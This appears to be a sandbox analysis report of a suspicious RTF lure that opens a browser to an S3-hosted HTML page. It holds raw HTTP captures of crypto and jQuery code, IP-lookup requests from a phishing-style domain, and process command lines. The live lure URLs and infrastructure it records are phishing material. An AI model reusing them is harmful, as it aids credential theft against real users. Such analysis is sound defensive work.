                                                                                      2024-11-15 17:09:13 UTC1369INData Raw: 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30
                                                                                      Data Ascii: for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0
                                                                                      2024-11-15 17:09:13 UTC1369INData Raw: 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66
                                                                                      Data Ascii: r,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:f
                                                                                      2024-11-15 17:09:13 UTC1369INData Raw: 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50
                                                                                      Data Ascii: harAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOP
                                                                                      2024-11-15 17:09:13 UTC1369INData Raw: 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69
                                                                                      Data Ascii: a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=thi
                                                                                      2024-11-15 17:09:13 UTC1369INData Raw: 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41
                                                                                      Data Ascii: ),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      33192.168.2.1662655151.101.130.1374437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:09:13 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                      Host: code.jquery.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:09:13 UTC610INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 89501
                                                                                      Server: nginx
                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                      Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                      ETag: "28feccc0-15d9d"
                                                                                      Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Fri, 15 Nov 2024 17:09:13 GMT
                                                                                      Age: 2707415
                                                                                      X-Served-By: cache-lga21931-LGA, cache-dfw-kdal2120023-DFW
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 2, 1
                                                                                      X-Timer: S1731690553.155149,VS0,VE1
                                                                                      Vary: Accept-Encoding
                                                                                      2024-11-15 17:09:13 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                      Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                      2024-11-15 17:09:13 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                      Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                      2024-11-15 17:09:13 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                      Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                      2024-11-15 17:09:13 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                      Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                      2024-11-15 17:09:13 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                      Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                      2024-11-15 17:09:13 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                      Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      34192.168.2.1662656104.26.12.2054437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:09:13 UTC561OUTGET /?format=json HTTP/1.1
                                                                                      Host: api.ipify.org
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Origin: https://gambol.smarthost.pl
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://gambol.smarthost.pl/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:09:13 UTC438INHTTP/1.1 200 OK
                                                                                      Date: Fri, 15 Nov 2024 17:09:13 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 23
                                                                                      Connection: close
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Vary: Origin
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e30d9054e52e867-DFW
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1169&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1139&delivery_rate=2421404&cwnd=251&unsent_bytes=0&cid=911170b70ae9688a&ts=343&x=0"
                                                                                      2024-11-15 17:09:13 UTC23INData Raw: 7b 22 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 39 22 7d
                                                                                      Data Ascii: {"ip":"173.254.250.89"}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      35192.168.2.1662657172.67.74.1524437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:09:14 UTC349OUTGET /?format=json HTTP/1.1
                                                                                      Host: api.ipify.org
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:09:14 UTC405INHTTP/1.1 200 OK
                                                                                      Date: Fri, 15 Nov 2024 17:09:14 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 23
                                                                                      Connection: close
                                                                                      Vary: Origin
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e30d90b381046e0-DFW
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1114&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=927&delivery_rate=2475213&cwnd=251&unsent_bytes=0&cid=e2f4672a88696545&ts=208&x=0"
                                                                                      2024-11-15 17:09:14 UTC23INData Raw: 7b 22 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 39 22 7d
                                                                                      Data Ascii: {"ip":"173.254.250.89"}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      36192.168.2.166265852.149.20.212443
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:09:24 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=f2cH6mg7mwxXTxP&MD=9XaRWou8 HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Accept: */*
                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                      Host: slscr.update.microsoft.com
                                                                                      2024-11-15 17:09:25 UTC560INHTTP/1.1 200 OK
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Content-Type: application/octet-stream
                                                                                      Expires: -1
                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                      ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                      MS-CorrelationId: 1528a358-53cf-468f-b3bd-027b9f225685
                                                                                      MS-RequestId: 9d04ba50-79de-49e1-9eb4-80b5a909e311
                                                                                      MS-CV: pmi6tf91MUCX4szb.0
                                                                                      X-Microsoft-SLSClientCache: 1440
                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Date: Fri, 15 Nov 2024 17:09:23 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 30005
                                                                                      2024-11-15 17:09:25 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                      Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                      2024-11-15 17:09:25 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                      Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:12:08:36
                                                                                      Start date:15/11/2024
                                                                                      Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\Iamgold-PYMPATA Policy_Enrollment2024739441.rtf" /o ""
                                                                                      Imagebase:0x850000
                                                                                      File size:1'620'872 bytes
                                                                                      MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:4
                                                                                      Start time:12:08:41
                                                                                      Start date:15/11/2024
                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s3.eu-west-1.amazonaws.com/patnla.chivivemie/mandlas%23%2377374%23etikos3438%2324737%23madbviewmine%23%26%23%26%23portca3737%237347739%23737373%2334773%2383838%23.html
                                                                                      Imagebase:0x7ff7f9810000
                                                                                      File size:3'242'272 bytes
                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:5
                                                                                      Start time:12:08:42
                                                                                      Start date:15/11/2024
                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      Wow64 process (32bit):false
